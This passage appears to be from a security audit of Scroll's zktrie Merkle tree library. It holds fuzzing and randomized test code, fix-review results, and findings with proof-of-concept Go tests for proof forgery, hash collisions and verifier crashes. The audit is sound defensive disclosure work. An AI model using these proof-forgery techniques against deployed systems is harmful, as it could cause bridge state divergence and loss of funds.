TOB-ZKTRIE-19. E. Go Fuzzing Harness During the assessment, we wrote a fuzzing harness for the Merkle tree proof verifier function. Because native Go does not support all necessary types, some proof structure types had to be manually constructed. Some parts of the proof were built naively, and the fuzzing harness can be iteratively improved by Scroll’s team. Running the go test -fuzz=FuzzVerifyProofZkTrie command will start the fuzzing campaign.
// Truncate or pad array to length sz func padtolen(arr []byte, sz int) []byte { if len(arr) < sz { arr = append(arr, bytes.Repeat([]byte{0}, sz-len(arr))...) } else { arr = arr[:sz] } return arr } func FuzzVerifyProofZkTrie(f *testing.F) { zkTrie, _ := newZkTrieImpl(NewZkTrieMemoryDb(), 10) k := zkt.NewHashFromBytes(bytes.Repeat([]byte("a"), 32)) vp := []zkt.Byte32{*zkt.NewByte32FromBytes(bytes.Repeat([]byte("b"), 32))} node := NewLeafNode(k, 1, vp) f.Fuzz(func(t *testing.T, existence bool, depth uint, notempties []byte, siblings []byte, nodeAuxA []byte, nodeAuxB []byte) { notempties = padtolen(notempties, 30) typedsiblings := make([]*zkt.Hash, 10) for i := range typedsiblings { typedsiblings[i] = zkt.NewHashFromBytes(padtolen(siblings, 32)) } typedata := [30]byte{} copy(typedata[:], notempties) var nodeAux *NodeAux if !existence { nodeAux = &NodeAux{ Key: zkt.NewHashFromBytes(padtolen(nodeAuxA, 32)), Value: zkt.NewHashFromBytes(padtolen(nodeAuxB, 32)), } } proof := &Proof{ Existence: existence, depth: depth, notempties: typedata, Siblings: typedsiblings, NodeAux: nodeAux, } if VerifyProofZkTrie(zkTrie.rootHash, proof, node) { panic("valid proof") } }) } Figure E.1: The fuzzing harness for VerifyProofZkTrie F. Go Randomized Test During the assessment, we wrote a simple randomized test to verify that the behavior of the zkTrie matches an ideal tree (i.e., an associative array). The test currently fails due to the verifier misbehavior described in this report. The test can be run with go test -v -run TestZkTrie_BasicRandomTest. // Basic randomized test to verify the trie's set, get, and remove features. func TestZkTrie_BasicRandomTest(t *testing.T) { root := zkt.Byte32{} db := NewZkTrieMemoryDb() zkTrie, err := NewZkTrie(root, db) assert.NoError(t, err) idealTrie := make(IdealTrie) const NUM_BYTES = 32 const NUM_KEYS = 1024 keys := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) data := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) // PHASE 1: toss a coin and set elements (Works) for i := 0; i < len(keys); i++ { if toss(t) == true { set(t, zkTrie, idealTrie, keys[i], data[i]) } } // PHASE 2: toss a coin and get elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { get(t, zkTrie, idealTrie, keys[i]) } } // PHASE 3: toss a coin and remove elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { remove(t, zkTrie, idealTrie, keys[i]) } } } Figure F.1: A basic randomized test for ZkTrie (trie/zk_trie_test.go) type IdealTrie = map[string][]byte func random_hex_str(t *testing.T, str_bytes int) string { outBytes := make([]byte, str_bytes) n, err := rand.Read(outBytes) assert.NoError(t, err) assert.Equal(t, n, str_bytes) return hex.EncodeToString(outBytes) } func random_hex_str_array(t *testing.T, str_bytes int, array_size int) []string { out := []string{} for i := 0; i < array_size; i++ { hex_str := random_hex_str(t, str_bytes) out = append(out, hex_str) } return out } // Randomly returns true or false func toss(t *testing.T) bool { n, err := rand.Int(rand.Reader, big.NewInt(2)) assert.NoError(t, err) return (n.Cmp(big.NewInt(1)) == 0) } func hex_to_bytes(t *testing.T, hex_str string) []byte { key, err := hex.DecodeString(hex_str) assert.NoError(t, err) return key } func bytes_to_byte32(b []byte) []zkt.Byte32 { if len(b)%32 != 0 { panic("unaligned arrays are unsupported") } l := len(b) / 32 out := make([]zkt.Byte32, l) i := 0 for i < l { copy(out[i][:], b[i*32:(i+1)*32]) i += 1 } return out } // Tests that an inclusion proof for a given key can be generated and verified.
func verify_inclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.True(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.NoError(t, err) assert.NotNil(t, hash) } // Tests that a non-inclusion proof for a given key can be generated and verified. func verify_noninclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.False(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.Error(t, err) assert.Nil(t, hash) } // Verifies that adding elements to the trie works. func set(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string, data_hex string) { vFlag := uint32(1) key := hex_to_bytes(t, key_hex) data := hex_to_bytes(t, data_hex) err := zkTrie.TryUpdate(key, vFlag, bytes_to_byte32(data)) assert.NoError(t, err) idealTrie[key_hex] = data verify_inclusion(t, zkTrie, key) } // Verifies that retrieving elements from the trie works. func get(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) ideal_data, ok := idealTrie[key_hex] if ok { trie_data, err := zkTrie.TryGet(key) assert.NoError(t, err) assert.True(t, reflect.DeepEqual(trie_data, ideal_data)) verify_inclusion(t, zkTrie, key) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) verify_noninclusion(t, zkTrie, key) } } // Verifies that removing elements from the trie works. func remove(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) _, ok := idealTrie[key_hex] if ok { delete(idealTrie, key_hex) err := zkTrie.TryDelete(key) assert.NoError(t, err) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) } verify_noninclusion(t, zkTrie, key) } Figure F.2: Helper functions for TestZkTrie_BasicRandomTest (trie/zk_trie_test.go) G. Fix Review Results When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not a comprehensive analysis of the system. On September 13, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. Trail of Bits received fix PRs for findings TOB-ZKTRIE-1, TOB-ZKTRIE-4, TOB-ZKTRIE-5, TOB-ZKTRIE-16, TOB-ZKTRIE-18, and TOB-ZKTRIE-19. Scroll did not provide fix PRs for the medium-severity findings TOB-ZKTRIE-2, TOB-ZKTRIE-10, and TOB-ZKTRIE-12; the low-severity finding TOB-ZKTRIE-11; or the remaining findings, all of which are of informational severity. In summary, of the 19 issues described in this report, Scroll has resolved five issues and has partially resolved one issue. No fix PRs were provided for the remaining 13 issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below.
ID Title Status
1 Lack of domain separation allows proof forgery: Resolved
2 Lack of proof validation causes denial of service on the verifier: Undetermined
3 Two incompatible ways to generate proofs: Undetermined
4 BuildZkTrieProof does not populate NodeAux.Value: Resolved
5 Leaf nodes with different values may have the same hash: Resolved
6 Empty UpdatePreimage function body: Undetermined
7 CanonicalValue is not canonical: Undetermined
8 ToSecureKey and ToSecureKeyBytes implicitly truncate the key: Undetermined
9 Unused key argument on the bridge_prove_write function: Undetermined
10 The PreHandlingElems function panics with an empty elems array: Undetermined
11 The hash_external function panics with integers larger than 32 bytes: Undetermined
12 Mishandling of cgo.Handles causes runtime errors: Undetermined
13 Unnecessary unsafe pointer manipulation in Node.Data(): Undetermined
14 NewNodeFromBytes does not fully validate its input: Undetermined
15 init_hash_scheme is not thread-safe: Undetermined
16 Safe-Rust ZkMemoryDb interface is not thread-safe: Resolved
17 Some Node functions return the zero hash instead of errors: Undetermined
18 get_account can read past the buffer: Partially Resolved
19 Unchecked usize to c_int casts allow hash collisions by length misinterpretation: Resolved
Detailed Fix Review Results TOB-ZKTRIE-1: Lack of domain separation allows proof forgery Resolved in PR #11. Domain separation is now performed between leaves, Byte32 values, and several different types of internal branches. Additionally, sequence-length domain separation has been added to HashElems as part of the fixes for finding TOB-ZKTRIE-5. HashElemsWithDomain does not add its own domain separation and is potentially error-prone. It appears to be used correctly, but the Scroll team should consider making HashElemsWithDomain private to prevent misuse. TOB-ZKTRIE-2: Lack of proof validation causes denial of service on the verifier Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-3: Two incompatible ways to generate proofs Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-4: BuildZkTrieProof does not populate NodeAux.Value Resolved in PR #11. The BuildZkTrieProof function now calls ValueHash, which populates NodeAux. TOB-ZKTRIE-5: Leaf nodes with different values may have the same hash Resolved in PR #11. NodeHash now uses HandlingElemsAndByte32, which calls HashElems, which adds domain separation based on the length of its input to recursive calls in the internal Merkle tree structure. TOB-ZKTRIE-6: Empty UpdatePreimage function body Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-7: CanonicalValue is not canonical Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-8: ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-9: Unused key argument on the bridge_prove_write function Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-10: The PreHandlingElems function panics with an empty elems array Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-11: The hash_external function panics with integers larger than 32 bytes Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-12: Mishandling of cgo.Handles causes runtime errors Undetermined.
No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-13: Unnecessary unsafe pointer manipulation in Node.Data() Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-14: NewNodeFromBytes does not fully validate its input Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-15: init_hash_scheme is not thread-safe Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-16: Safe-Rust ZkMemoryDb interface is not thread-safe Resolved in PR #12. The use of the non-thread-safe function Database.Init was replaced with Put, which is thread-safe. The Scroll team should consider adding cautionary documentation to Init to prevent its misuse in the future. TOB-ZKTRIE-17: Some Node functions return the zero hash instead of errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-18: get_account can read past the buffer Partially resolved in PR #13. The get_account function now verifies the slice length. However, the function may still misbehave on platforms where Go’s int type is 32 bits if it is given a value above 2^31, which may cause the cast to overflow. This seems extremely unlikely to cause problems in practice. However, adding assert calls to ZkTrie::get and TrieGetSize to restrict the size to be below a reasonable upper bound such as 2^30 would prevent this issue entirely by causing the program to terminate if the affected code is misused on a problematic platform. TOB-ZKTRIE-19: Unchecked usize to c_int casts allow hash collisions by length misinterpretation Resolved in PR #14. The implementation will now crash instead of triggering the bug. The Scroll team should watch for possible denials of service when deploying the software. H. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed.
Fix Status
Status Description
Undetermined: The status of the issue was not determined during this engagement.
Unresolved: The issue persists and has not been resolved.
Partially Resolved: The issue persists but has been partially resolved.
Resolved: The issue has been sufficiently resolved.
+1. Lack of domain separation allows proof forgery Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-1 Target: trie/zk_trie_node.go Description Merkle trees are nested tree data structures in which the hash of each branch node depends upon the hashes of its children. The hash of each node is then assumed to uniquely represent the subtree of which that node is a root. However, that assumption may be false if a leaf node can have the same hash as a branch node. A general method for preventing leaf and branch nodes from colliding in this way is domain separation. That is, given a hash function H, define the hash of a leaf to be H(f(leaf_data)) and the hash of a branch to be H(g(branch_data)), where f and g are encoding functions that can never return the same result (perhaps because f’s return values all start with the byte 0 and g’s all start with the byte 1). Without domain separation, a malicious entity may be able to insert a leaf into the tree that can be later used as a branch in a Merkle path. In zktrie, the hash for a node is defined by the NodeHash method, shown in figure 1.1.
As shown in the highlighted portions, the hash of a branch node is HashElems(n.ChildL, n.ChildR), while the hash of a leaf node is HashElems(1, n.NodeKey, n.valueHash). // LeafHash computes the key of a leaf node given the hIndex and hValue of the // entry of the leaf. func LeafHash(k, v *zkt.Hash) (*zkt.Hash, error) { return zkt.HashElems(big.NewInt(1), k.BigInt(), v.BigInt()) } // NodeHash computes the hash digest of the node by hashing the content in a // specific way for each type of node. This key is used as the hash of the // Merkle tree for each node. func (n *Node) NodeHash() (*zkt.Hash, error) { if n.nodeHash == nil { // Cache the key to avoid repeated hash computations. // NOTE: We are not using the type to calculate the hash! switch n.Type { case NodeTypeParent: // H(ChildL || ChildR) var err error n.nodeHash, err = zkt.HashElems(n.ChildL.BigInt(), n.ChildR.BigInt()) if err != nil { return nil, err } case NodeTypeLeaf: var err error n.valueHash, err = zkt.PreHandlingElems(n.CompressedFlags, n.ValuePreimage) if err != nil { return nil, err } n.nodeHash, err = LeafHash(n.NodeKey, n.valueHash) if err != nil { return nil, err } case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil } Figure 1.1: NodeHash and LeafHash (zktrie/trie/zk_trie_node.go#118–156) The function HashElems used here performs recursive hashing in a binary-tree fashion. For the purpose of this finding, the key property is that HashElems(1,k,v) == H(H(1,k),v) and HashElems(n.ChildL,n.ChildR) == H(n.ChildL,n.ChildR), where H is the global two-input, one-output hash function. Therefore, a branch node b and a leaf node l where b.ChildL == H(1,l.NodeKey) and b.ChildR == l.valueHash will have equal hash values. This allows proof forgery; for example, a malicious entity can insert a key that can be proved to be both present and nonexistent in the tree, as illustrated by the proof-of-concept test in figure 1.2.
func TestMerkleTree_ForgeProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run("Testing for malicious proofs", func(t *testing.T) { // Find two distinct values k1,k2 such that the first step of // the path has the sibling on the LEFT (i.e., path[0] == // false) k1, k2 := (func() (zkt.Byte32, zkt.Byte32) { k1 := zkt.Byte32{1} k2 := zkt.Byte32{2} k1_hash, _ := k1.Hash() k2_hash, _ := k2.Hash() for !getPath(1, zkt.NewHashFromBigInt(k1_hash)[:])[0] { for i := len(k1); i > 0; i -= 1 { k1[i-1] += 1 if k1[i-1] != 0 { break } } k1_hash, _ = k1.Hash() } for k1 == k2 || !getPath(1, zkt.NewHashFromBigInt(k2_hash)[:])[0] { for i := len(k2); i > 0; i -= 1 { k2[i-1] += 1 if k2[i-1] != 0 { break } } k2_hash, _ = k2.Hash() } return k1, k2 })() k1_hash_int, _ := k1.Hash() k2_hash_int, _ := k2.Hash() k1_hash := zkt.NewHashFromBigInt(k1_hash_int) k2_hash := zkt.NewHashFromBigInt(k2_hash_int) // create a dummy value for k2, and use that to craft a // malicious value for k1 k2_value := (&[2]zkt.Byte32{{2}})[:] k1_value, _ := NewLeafNode(k2_hash, 1, k2_value).NodeHash() k1_value_array := []zkt.Byte32{*zkt.NewByte32FromBytes(k1_value.Bytes())} // insert k1 into the trie with the malicious value assert.Nil(t, zkTrie.TryUpdate(zkt.NewHashFromBigInt(k1_hash_int), 0, k1_value_array)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } // query an inclusion proof for k1 k1Proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k1_hash_int, 10, getNode) assert.Nil(t, err) assert.True(t, k1Proof.Existence) // check that inclusion proof against our root hash k1_val_hash, _ := NewLeafNode(k1_hash, 0, k1_value_array).NodeHash() k1Proof_root, _ := k1Proof.Verify(k1_val_hash, k1_hash) assert.Equal(t, k1Proof_root, zkTrie.rootHash) // forge a non-existence proof fakeNonExistProof := *k1Proof fakeNonExistProof.Existence = false // The new non-existence proof needs one extra level, where // the sibling hash is H(1,k1_hash) fakeNonExistProof.depth += 1 zkt.SetBitBigEndian(fakeNonExistProof.notempties[:], fakeNonExistProof.depth-1) fakeSibHash, _ := zkt.HashElems(big.NewInt(1), k1_hash_int) fakeNonExistProof.Siblings = append(fakeNonExistProof.Siblings, fakeSibHash) // Construct the NodeAux details for the malicious leaf k2_value_hash, _ := zkt.PreHandlingElems(1, k2_value) k2_nodekey := zkt.NewHashFromBigInt(k2_hash_int) fakeNonExistProof.NodeAux = &NodeAux{Key: k2_nodekey, Value: k2_value_hash} // Check our non-existence proof against the root hash fakeNonExistProof_root, _ := fakeNonExistProof.Verify(k1_val_hash, k1_hash) assert.Equal(t, fakeNonExistProof_root, zkTrie.rootHash) // fakeNonExistProof and k1Proof prove opposite things. k1 // is both in and not-in the tree! assert.NotEqual(t, fakeNonExistProof.Existence, k1Proof.Existence) }) } Figure 1.2: A proof-of-concept test case for proof forgery Exploit Scenario Suppose Alice uses the zktrie to implement the Ethereum account table in a zkEVM-based bridge with trustless state updates. Bob submits a transaction that inserts specially crafted account data into some position in that tree. At a later time, Bob submits a transaction that depends on the result of an account table lookup. Bob generates two contradictory Merkle proofs and uses those proofs to create two zkEVM execution proofs that step to different final states. By submitting one proof each to the opposite sides of the bridge, Bob causes state divergence and a loss of funds.
Recommendations Short term, modify NodeHash to domain-separate leaves and branches, such as by changing the branch hash to zkt.HashElems(big.NewInt(2), n.ChildL.BigInt(), n.ChildR.BigInt()). Long term, fully document all data structure designs and requirements, and review all assumptions to ensure that they are well founded. +2. Lack of proof validation causes denial of service on the verifier Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-ZKTRIE-2 Target: trie/zk_trie_impl.go Description The Merkle tree proof verifier assumes several well-formedness properties about the received proof and node arguments. If at least one of these properties is violated, the verifier will encounter a runtime error. The first property that must hold is that the node associated with the Merkle proof must be a leaf node (i.e., must contain a non-nil NodeKey field). If this is not the case, computing rootFromProof for a nil NodeKey will cause a panic when computing the getPath function. Second, the Proof fields must be consistent with one another: blindly trusting the proof’s depth field can cause out-of-bounds accesses to both the NodeKey and the notempties fields. Finally, the Siblings array length should also be validated; for example, VerifyProofZkTrie will panic due to an out-of-bounds access if the proof.Siblings field is empty (highlighted in yellow in the rootFromProof function). // VerifyProof verifies the Merkle Proof for the entry and root. func VerifyProofZkTrie(rootHash *zkt.Hash, proof *Proof, node *Node) bool { nodeHash, err := node.NodeHash() if err != nil { return false } rootFromProof, err := proof.Verify(nodeHash, node.NodeKey) if err != nil { return false } return bytes.Equal(rootHash[:], rootFromProof[:]) } // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } func (proof *Proof) rootFromProof(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { var err error sibIdx := len(proof.Siblings) - 1 path := getPath(int(proof.depth), nodeKey[:]) var siblingHash *zkt.Hash for lvl := int(proof.depth) - 1; lvl >= 0; lvl-- { if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) { siblingHash = proof.Siblings[sibIdx] sibIdx-- } else { siblingHash = &zkt.HashZero } if path[lvl] { nodeHash, err = NewParentNode(siblingHash, nodeHash).NodeHash() if err != nil { return nil, err } } else { nodeHash, err = NewParentNode(nodeHash, siblingHash).NodeHash() if err != nil { return nil, err } } } return nodeHash, nil } Figure 2.1: zktrie/trie/zk_trie_impl.go#595– Exploit Scenario An attacker crafts an invalid proof that causes the proof verifier to crash, causing a denial of service in the system. Recommendations Short term, validate the proof structure before attempting to use its values. Add fuzz testing to the VerifyProofZkTrie function. Long term, add extensive tests and fuzz testing to functions interfacing with attacker-controlled values.
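A hedged sketch of the kind of up-front validation the verifier could perform (field names are taken from figure 2.1; the exact bounds and the helper name are illustrative):

// validateProof rejects proofs whose fields are mutually inconsistent
// before rootFromProof dereferences them.
func validateProof(proof *Proof, node *Node) error {
	if node == nil || node.NodeKey == nil {
		return errors.New("proof must be checked against a leaf node with a non-nil NodeKey")
	}
	if int(proof.depth) > len(proof.notempties)*8 {
		return errors.New("proof depth exceeds the notempties bitmap")
	}
	// Every set bit in notempties must be matched by exactly one sibling hash.
	expected := 0
	for lvl := 0; lvl < int(proof.depth); lvl++ {
		if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) {
			expected++
		}
	}
	if expected != len(proof.Siblings) {
		return errors.New("sibling count does not match the notempties bitmap")
	}
	return nil
}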
+3. Two incompatible ways to generate proofs Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-ZKTRIE-3 Target: trie/{zk_trie.go, zk_trie_impl.go} Description There are two incompatible ways to generate proofs. The first implementation (figure 3.1) writes to a given callback, effectively returning []bytes. It does not have a companion verification function; it has only positive tests (zktrie/trie/zk_trie_test.go#L93-L125); and it is accessible from the C function TrieProve and the Rust function prove. The second implementation (figure 3.2) returns a pointer to a Proof struct. It has a companion verification function (zktrie/trie/zk_trie_impl.go#L595-L632); it has positive and negative tests (zktrie/trie/zk_trie_impl_test.go#L484-L537); and it is not accessible from C or Rust. // Prove is a simlified calling of ProveWithDeletion func (t *ZkTrie) Prove(key []byte, fromLevel uint, writeNode func(*Node) error) error { return t.ProveWithDeletion(key, fromLevel, writeNode, nil) } // ProveWithDeletion constructs a merkle proof for key. The result contains all encoded nodes // on the path to the value at key. The value itself is also included in the last // node and can be retrieved by verifying the proof. // // If the trie does not contain a value for key, the returned proof contains all // nodes of the longest existing prefix of the key (at least the root node), ending // with the node that proves the absence of the key. // // If the trie contain value for key, the onHit is called BEFORE writeNode being called, // both the hitted leaf node and its sibling node is provided as arguments so caller // would receive enough information for launch a deletion and calculate the new root // base on the proof data // Also notice the sibling can be nil if the trie has only one leaf func (t *ZkTrie) ProveWithDeletion(key []byte, fromLevel uint, writeNode func(*Node) error, onHit func(*Node, *Node)) error { [...] } Figure 3.1: The first way to generate proofs (zktrie/trie/zk_trie.go#143–164) // Proof defines the required elements for a MT proof of existence or // non-existence. type Proof struct { // existence indicates wether this is a proof of existence or // non-existence. Existence bool // depth indicates how deep in the tree the proof goes. depth uint // notempties is a bitmap of non-empty Siblings found in Siblings. notempties [zkt.HashByteLen - proofFlagsLen]byte // Siblings is a list of non-empty sibling node hashes. Siblings []*zkt.Hash // NodeAux contains the auxiliary information of the lowest common ancestor // node in a non-existence proof. NodeAux *NodeAux } // BuildZkTrieProof prove uniformed way to turn some data collections into Proof struct func BuildZkTrieProof(rootHash *zkt.Hash, k *big.Int, lvl int, getNode func(key *zkt.Hash) (*Node, error)) (*Proof, *Node, error) { [...] } Figure 3.2: The second way to generate proofs (zktrie/trie/zk_trie_impl.go#531–551) Recommendations Short term, decide on one implementation and remove the other implementation. Long term, ensure full test coverage in the chosen implementation; ensure the implementation has both positive and negative testing; and add fuzz testing to the proof verification routine. +4. 
BuildZkTrieProof does not populate NodeAux.Value Severity: Low Difficulty: Low Type: Testing Finding ID: TOB-ZKTRIE-4 Target: trie/zk_trie_impl.go Description A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2, where k != k2. In the zktrie codebase, that second case is handled by the NodeAux field in the Proof struct, as illustrated in figure 4.1. // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609–632) When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash fields to populate the Key and Value fields of NodeAux, as shown in figure 4.2. However, the valueHash field of this node may be nil, causing NodeAux.Value to be nil and causing proof verification to crash with a nil pointer dereference error, which can be triggered by the test case shown in figure 4.3. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560–574) func TestMerkleTree_GetNonIncProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run("Testing for non-inclusion proofs", func(t *testing.T) { k := zkt.Byte32{1} k_value := (&[1]zkt.Byte32{{1}})[:] k_other := zkt.Byte32{2} k_hash_int, _ := k.Hash() k_other_hash_int, _ := k_other.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int) assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode) assert.Nil(t, err) assert.False(t, proof.Existence) proof_root, _ := proof.Verify(nil, k_other_hash) assert.Equal(t, proof_root, zkTrie.rootHash) }) } Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in figure 4.4, fixes this problem, since NodeHash computes the leaf's valueHash as a side effect. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex if _, err := n.NodeHash(); err != nil { return nil, nil, err } p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.4: Adding the n.NodeHash() call fixes this problem. (zktrie/trie/zk_trie_impl.go#560–574)
Exploit Scenario An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to a loss of service. Recommendations Short term, fix BuildZkTrieProof by adding a call to n.NodeHash(), as described above. Long term, ensure that all major code paths in important functions, such as proof generation and verification, are tested. The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested: Figure 4.5: The Go coverage analysis report +5. Leaf nodes with different values may have the same hash Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-5 Target: trie/zk_trie_node.go, types/util.go Description The hash value of a leaf node is derived from the hash of its key and its value. A leaf node’s value comprises up to 256 32-byte fields, and that value’s hash is computed by passing those fields to the HashElems function. HashElems hashes these fields in a Merkle tree–style binary tree pattern, as shown in figure 5.1. func HashElems(fst, snd *big.Int, elems ...*big.Int) (*Hash, error) { l := len(elems) baseH, err := hashScheme([]*big.Int{fst, snd}) if err != nil { return nil, err } if l == 0 { return NewHashFromBigInt(baseH), nil } else if l == 1 { return HashElems(baseH, elems[0]) } tmp := make([]*big.Int, (l+1)/2) for i := range tmp { if (i+1)*2 > l { tmp[i] = elems[i*2] } else { h, err := hashScheme(elems[i*2 : (i+1)*2]) if err != nil { return nil, err } tmp[i] = h } } return HashElems(baseH, tmp[0], tmp[1:]...) } Figure 5.1: Binary-tree hashing in HashElems (zktrie/types/util.go#9–36) However, HashElems does not include the number of elements being hashed, so leaf nodes with different values may have the same hash, as illustrated in the proof-of-concept test case shown in figure 5.2. func TestMerkleTree_MultiValue(t *testing.T) { t.Run("Testing for value collisions", func(t *testing.T) { k := zkt.Byte32{1} k_hash_int, _ := k.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) value1 := (&[3]zkt.Byte32{{1}, {2}, {3}})[:] value1_hash, _ := NewLeafNode(k_hash, 0, value1).NodeHash() first2_hash, _ := zkt.PreHandlingElems(0, value1[:2]) value2 := (&[2]zkt.Byte32{*zkt.NewByte32FromBytes(first2_hash.Bytes()), {3}})[:] value2_hash, _ := NewLeafNode(k_hash, 0, value2).NodeHash() assert.NotEqual(t, value1, value2) assert.NotEqual(t, value1_hash, value2_hash) }) } Figure 5.2: A proof-of-concept test case for value collisions Exploit Scenario An adversary inserts a maliciously crafted value into the tree and then creates a proof for a different, colliding value. This violates the security requirements of a Merkle tree and may lead to incorrect behavior such as state divergence. Recommendations Short term, modify PreHandlingElems to prefix the ValuePreimage array with its length before being passed to HashElems. Long term, document and review all uses of hash functions to ensure that they commit to their inputs. +6. Empty UpdatePreimage function body Severity: Informational Difficulty: N/A Type: Auditing and Logging Finding ID: TOB-ZKTRIE-6 Target: trie/zk_trie_database.go Description The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or log a warning; this would prevent the function from being used without any indication that it does nothing. func (db *Database) UpdatePreimage([]byte, *big.Int) {} Figure 